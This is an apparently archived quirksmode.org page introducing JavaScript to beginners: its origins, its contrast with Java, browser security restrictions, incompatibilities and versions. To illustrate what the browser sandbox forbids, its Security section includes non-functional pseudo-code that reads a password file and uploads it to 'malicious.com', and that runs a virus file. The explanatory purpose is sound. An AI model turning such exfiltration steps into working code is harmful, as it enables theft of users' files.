<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en">
<head>
<title>Javascript - General Introduction</title>
<link rel="stylesheet" href="../quirksmode.css" />
<link rel="up" href="contents.html" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="../quirksmode.js"></script>
</head>
<body bgcolor="#ffffff">

<h2>General introduction</h2>

<div id="header"></div>

<div class="floater">
<p>See chapter 1 of <a href="/book/">the book</a>.</p>
<p>JavaScript is supported by Mozilla (from Netscape 2), Explorer (from version 3), Opera (from version 3),
Safari, iCab, and Konqueror. I regularly test my scripts in these browsers. See also the "Browser compatibility"
section on the <a href="/resources.html#browsers">Resources page</a>.</p>
<p>In addition, the following browsers support JavaScript, but I don't test my scripts in them:</p>
<ul>
	<li>Hotjava 3</li>
	<li>WebTV</li>
	<li>OmniWeb</li>
	<li>QNX Voyager</li>
	<li>NetBox</li>
	<li>Amiga-AWeb</li>
	<li>Amiga Voyager</li>
	<li>Sega Dreamcast</li>
	<li>Ant Fresco (Risc)</li>
	<li>as well as several mobile phone browsers</li>
</ul>
<p>This list is not complete.</p>
<p>This page has been translated into <a href="http://www.misfu.com/static/Javascript/intro.html" class="external">French</a>
and <a href="http://wiki.ceviz.net/index.php/Quirksmode.org/Tan%C4%B1%C5%9Fal%C4%B1m" class="external">Turkish</a>.</p>
</div>

<p class="intro">JavaScript is most commonly used as a client side scripting language.
This means that JavaScript code is written into
an HTML page. When a user requests an HTML page with JavaScript in it, the script
is sent to the browser and it's up to the browser to do something with it.</p>

<p>The fact that the script is in the HTML page  means that your scripts can be seen and copied by whoever views your page.
Nonetheless, to my mind this openness is a great advantage, because the flip side is
that you can view, study and use any JavaScript you encounter on the WWW.</p>

<p>JavaScript can be used in other contexts than a Web browser. Netscape created server-side
JavaScript as a CGI-language that can do roughly the same as Perl or ASP. There is no reason
why JavaScript couldn&#8217;t be used to write real, complex programs. However, this site exclusively
deals with the use of JavaScript in web browsers.</p>

<p>If you don&#8217;t have any programming experience at all it&#8217;s best to start with some
gentle JavaScript examples that teach you the basics. It might be a good idea to buy
Negrino & Smith,
&#8220;<a href="http://www.javascriptworld.com/"
	 class="external">JavaScript for the World Wide Web</a>&#8221;, 4th edition, Peachpit
Press, 2001. It contains some very useful examples and though it doesn&#8217;t treat advanced programming
tricks, it will certainly help you get started. Of course this site also offers plenty of help.</p>

<p>I can also recommend Jeremy Keith, <a href="http://domscripting.com/book/" class="external">DOM Scripting:
Web Design with JavaScript and the Document Object Model</a>, 1st edition, Friends of Ed, 2005. This, too, is a
book that doesn't delve too deeply into technology, but gives non-programmers such as graphic designers/CSS
wizards an excellent overview of the most common uses of JavaScript - as well as the most common problems.</p>

<h3>JavaScript vs. Java</h3>

<p class="accent">JavaScript is <em>not</em> the same as Java. I repeat: JavaScript is <em>not</em> the same as Java.</p>

<p>Although the names are much alike, JavaScript is primarily a scripting language for use
within HTML pages, while Java is a real programming language that does quite different things
from JavaScript. In addition Java is much harder to learn. It was developed by
<a href="http://www.sun.com" class="external" >Sun</a>
for use in pretty much anything that needs some computing power.</p>

<p>JavaScript was developed by Brendan Eich, then working at
<a href="http://www.netscape.com" class="external" >Netscape</a>,
as a client side scripting language (even though there's no fundamental reason why it can't be used in a
server side environment).</p>

<p>Originally the language was called Live Script, but when it was about to be released Java had become
immensely popular (and slightly hypey). At the last possible moment Netscape changed the
name of its scripting language to &#8220;JavaScript&#8221;. This was done purely for marketing reasons. Worse,
Eich was ordered to "make it look like Java". This has given rise to the idea that JavaScript is a
"dumbed-down" version of Java. Unfortunately there's not the slightest shred of truth in this story.</p>

<p>Java and JavaScript both descend from C and C++, but the languages (or rather, their ancestors)
have gone in quite different directions. You can see them as distantly related cousins. Both
are object oriented (though this is less important in JavaScript than in many other languages)
and they share some syntax, but the differences are more important than the similarities.</p>

<p>If you are a C++ or Java programmer you will be
surprised by some of JavaScript&#8217;s features. Since I don&#8217;t have any previous programming
experience, the differences are not described on this site. The best you can
do is buy David Flanagan,
&#8220;<a href="http://www.oreilly.com/catalog/jscript5/"
	 class="external">JavaScript, the Definitive Guide</a>&#8221;,
5th edition, O&#8217;Reilly, 2006. In this book the differences between C++/Java and JavaScript are
clearly explained. I co&#8211;edited a few chapters of this book.</p>

<a name="scripting"></a>
<h3>The JavaScript language</h3>

<p>JavaScript is not a programming language in strict sense. Instead, it is a scripting language because
it uses the browser to do the dirty work. If you command an image to be replaced by
another one, JavaScript tells the browser to go do it. Because the browser actually does
the work, you only need to pull some strings by writing some relatively easy lines
of code. That&#8217;s what makes JavaScript an easy language to start with.</p>

<p>But don&#8217;t be fooled by some beginner&#8217;s luck: JavaScript can be pretty difficult,
too. First of all, despite its simple appearance it is a full fledged programming language: it
is possible to write quite complex programs in JavaScript. This is rarely necessary when dealing
with web pages, but it is possible. This means that there are some complex programming structures
that you&#8217;ll only understand after protracted studies.</p>

<p>Secondly, and more importantly, there are the browser differences. Though modern web browsers
all support JavaScript, there is no sacred law that says they should support exactly the same
JavaScript. A large part of this site is devoted to exploring and explaining these browser differences
and finding ways to cope with them.</p>

<p>So basic JavaScript is easy to learn, but when you start writing advanced scripts browser differences
(and occasionally syntactic problems) will creep up.</p>

<h3>Security</h3>

<p>Client&#8211;side JavaScript has expressly been developed for use in a web browser in
conjunction with HTML pages. This has certain consequences for security.</p>

<p>First of all, please note carefully what happens when a user visits a JavaScript&#8211;enhanced
web site:<br />
The user asks for a certain HTML page without knowing whether it contains JavaScript.
The HTML page is delivered to the browser, including the scripts.
The scripts usually run automatically when the page loads or when the user takes a certain
action. In general the user can&#8217;t do anything to stop the scripts (well, he could turn
off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript
exists).
</p>

<p>So basically an innocent end user downloads a random program and allows it to be executed on
his machine. Therefore there should be strict rules as to what this program can and cannot do.</p>

<ol>
<li>JavaScript cannot read files from or write them to the file system on the computer. This
would be a clear security hazard
<pre class="wrong">
filesystem.read('/my/password/file');
filesystem.write('horridvirus.exe');
</pre>
</li>
<li>JavaScript cannot execute any other programs. This would also be unacceptable
<pre class="wrong">
execute('horridvirus.exe')
</pre></li>
<li>JavaScript cannot establish any connection to whatever computer, except to download a new
HTML page or to send mail. This, too, would create unacceptable hazards:
<pre class="wrong">
var security_hazard = connection.open('malicious.com');
security_hazard.upload(filesystem.read('/my/password/file'));
security_hazard.upload(filesystem.read('/ultra_secret/loans.xls'));
</pre></li>
</ol>

<p>Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen
fit to add some filesystem commands nonetheless, in combination with its ActiveX technology.
This means that Explorer on Windows is structurally less safe than any other browser. It has
some built&#8211;in protection, but hackers regularly find weaknesses. The first
<a href="http://www.symantec.com/avcenter/venc/data/js.gigger.a@mm.html"
	class="external" >JavaScript virus</a> I heard of works in such a way.</p>

<p>So JavaScript only works on things that are in HTML pages or part of the browser.
You cannot influence anything that's not contained by the browser. But even within the browser
there are some no&#8211;go areas. Basically JavaScript wants to protect the privacy of the
user by disallowing some actions and asking permission for others:</p>

<ol>
<li>You cannot read out the history of the browser. Thus a malicious site owner
cannot write a script that finds out where you surfed to recently.<br />
You can go back or forward in the browsing history, but you cannot find out which page you&#8217;ll
go to.</li>
<li>You cannot do anything in pages that come from another server. So if your frameset contains
two pages from two servers, they cannot communicate with each other. Thus a malicious site
owner cannot find out which sites you&#8217;ve opened in other browser windows. See the
<a href="framebust.html">frame busting</a> page for some more information.</li>
<li>You cannot set the value of a file upload field (<code>&lt;input type="file"&gt;</code>).
<pre class="wrong">
document.forms[0].upload_field.value = '/my/password/file';
document.forms[0].submit();
</pre></li>
<li>If you try to close a browser window that has <em>not</em> been opened by JavaScript,
the user is asked to confirm this action.<br />
However, this rule isn't implemented in all browsers and is
<a href="croswin.html#closingopener">easy to work around</a> in Explorer.</li>
<li>If you try to submit a form to a mail address by JavaScript, the user is asked to confirm
this action.</li>
<li>You should not be able to open a new window smaller than 100x100 pixels and/or to position
it outside the screen area of the computer. Thus a malicious site owner cannot spawn an
invisible window.<br />
Note that Explorer on Windows (and maybe other browsers, too) does allow this, contrary to
safety regulations.</li>
</ol>

<p>Thus JavaScript is a scripting language for influencing HTML elements, like forms,
images, layers, paragraphs and such, and for influencing a few non&#8211;HTML objects like
the browser window. Nothing more, but (most importantly) nothing less.</p>

<h3>Browser incompatibilities</h3>

<p>When a user receives a page which includes JavaScript, the JavaScript interpreter of his
browser kicks in and tries to execute the script. Now the main problem here is that the
various browsers each use their own interpreter, and that sometimes browser vendors have
chosen not to implement a bit of JavaScript. Their reasons were usually related to business
advantage over the competitors.</p>

<p>Hence the feared <em>browser incompatibilities</em>.</p>

<p>In addition each new browser version understands more JavaScript and allows more and
more parts of the HTML page to be changed by scripts. This leads to even more
incompatibilities.</p>

<p>It&#8217;s best to solve compatibility problems on a case&#8211;by&#8211;case
basis. In fact, most pages on this site have been written precisely because of
browser incompatibilities. So read on to understand more. But I warn you: you need to digest quite
a lot of information. Therefore it&#8217;s best to solve the problem at
hand and leave the rest of the information alone until you need it.</p>

<h3>JavaScript versions</h3>

<p>There have been several formal versions of JavaScript.</p>

<ul>
<li>1.0: Netscape 2</li>
<li>1.1: Netscape 3 and Explorer 3 <span class="smaller">(the latter has <em>bad</em> JavaScript support, regardless of its version)</span></li>
<li>1.2: Early Version 4 browsers</li>
<li>1.3: Later Version 4 browsers and Version 5 browsers</li>
<li>1.4: Not used in browsers, only on Netscape servers</li>
<li>1.5: Current version.</li>
<li>2.0: Currently <a href="http://weblogs.mozillazine.org/roadmap/" class="external">under development by Brendan Eich</a> and others.</li>
</ul>

<p>Originally, these version numbers were supposed to give support information.
This-and-that method would only be supported by browsers understanding JavaScript 1.something .
The higher the version number, the more nifty features the browser would support.</p>

<pre class="wrong">
&lt;script language="javascript1.3" type="text/javascript"&gt;
&lt;!--
complex script goes here and is executed
only by browsers that support JavaScript 1.3
// --&gt;
&lt;/script&gt;

&lt;script language="javascript1.0" type="text/javascript"&gt;
&lt;!--
simple script goes here and is executed
by all JavaScript browsers
// --&gt;
&lt;/script&gt;
</pre>

<p>Unfortunately Netscape 3 does not recognize the language attribute in a
<a href="placejs.html#include">JavaScript include</a> tag. So if you do:</p>

<pre>
&lt;script language="JavaScript1.3" src="somescript.js"&gt;&lt;/script&gt;
</pre>

<p>Netscape 3 loads the script, even though it doesn't support JavaScript 1.3, and shows a
lot of error messages. Too bad.</p>

<h3>Can a browser handle my script?</h3>

<p>However, one very important distinction must be made. The main modules of JavaScript are
Core and DOM, as I will explain more fully on a later page. JavaScript versions can be very helpful
when trying to determine Core support, but they are useless for determining DOM support, or
any browser feature.</p>

<p>In addition, specifying <code>JavaScript 1.2</code> in Netscape 4 can have some unexpected
side effects that are too complicated to explain right now.</p>

<p>Therefore I pay little attention to the versions, and I advise you not to use them.
Two browsers may claim to support JavaScript 1.2 but nevertheless be quite different
(Netscape 4 and Explorer 4 spring to mind). So for day&#8211;to&#8211;day scripts the JavaScript
version is unimportant.</p>


<p>Then how do you determine whether a browser can handle your script? The basic rule is: don&#8217;t use a
<a href="detect.html">browser detect</a>, use an <a href="support.html">object detect</a>.</p>

<h3>Beginners</h3>

<p>If you&#8217;re a beginning JavaScripter, read the
<a href="support.html">Object detection</a> page first. It&#8217;s the most important
page on this site since it gives you the basic JavaScript rule: don&#8217;t use a browser
detect, use object detection.</p>

<p>After that you&#8217;re on your own. Later on I&#8217;ll provide a more structured introduction
to the various modules of JavaScript.</p>

<div id="footer"><a href="/home.html">Home</a> <a href="/sitemap.html">Sitemap</a>
<p class="smaller" id="validation">Valid XHTML 1.0</p>
</div>

</body>
</html>
